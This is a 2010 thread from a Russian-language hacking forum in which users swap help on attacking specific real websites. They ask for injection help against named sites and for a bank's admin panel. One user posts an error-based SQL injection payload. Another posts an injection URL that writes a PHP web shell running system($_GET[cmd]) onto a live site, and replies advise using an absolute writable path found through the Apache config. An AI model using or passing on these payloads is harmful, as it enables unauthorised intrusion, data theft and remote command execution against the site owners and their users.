HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15301  
Старый 12.10.2010, 18:03
zolter
Guest
Сообщений: n/a
Провел на форуме:
784

Репутация: 0
По умолчанию

Помогите раскрутить http://parus-grad.com.ua/SearchResult.html?ot=(select+test)
 
Ответить с цитированием

  #15302  
Старый 12.10.2010, 18:37
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Хм.. при таком запросе,

Код:
Code:
1' or (select count(*) from information_schema.tables group by concat((select concat_ws(0x3a,id,name,value,comments) from bla.configuration limit 0,1),floor(rand(0)*2)))/*
тоже выдает

Subquery returns more than 1 row

С чем это может быть связано? ..таблица configuration единственная.
 
Ответить с цитированием

  #15303  
Старый 12.10.2010, 18:45
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию

Помогите найти админку

http://www.zembank.ru/

В ПМ пожалуйста
 
Ответить с цитированием

  #15304  
Старый 12.10.2010, 23:17
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

Цитата:
Сообщение от None  
Access denied for user 'u1001104_spark'@'%' to database 'information_schema'
takoe mozhet byt'?
 
Ответить с цитированием

  #15305  
Старый 13.10.2010, 01:34
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от j0ker13  
j0ker13 said:
takoe mozhet byt'?
а что в этом не понятного? нету прав на information_schema
 
Ответить с цитированием

  #15306  
Старый 13.10.2010, 10:21
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

подскажите, тут просто ошибка mysql или можно что-то выкружить:

http://jmatch.com/member/profile.php?profile_id=21295740'
 
Ответить с цитированием

  #15307  
Старый 13.10.2010, 19:31
0pTik
Guest
Сообщений: n/a
Провел на форуме:
43982

Репутация: 17
По умолчанию

Заливаю шелл

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+outfile+%271.php%27

[/COLOR][/COLOR
-- и никак не могу найти его ))
 
Ответить с цитированием

  #15308  
Старый 13.10.2010, 20:05
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Путь нужно указывать абсолютный. Папка, в которую пишешь, должна быть доступна для записи.
 
Ответить с цитированием

  #15309  
Старый 13.10.2010, 20:40
0pTik
Guest
Сообщений: n/a
Провел на форуме:
43982

Репутация: 17
По умолчанию

Спасибо буду думать как мне путь узнать
 
Ответить с цитированием

  #15310  
Старый 13.10.2010, 23:21
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

Цитата:
Сообщение от 0pTik  
0pTik said:
Спасибо буду думать как мне путь узнать
Раз file_priv есть, то ищи конфиг апача. Там будет полный путь до твоего ресурса.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ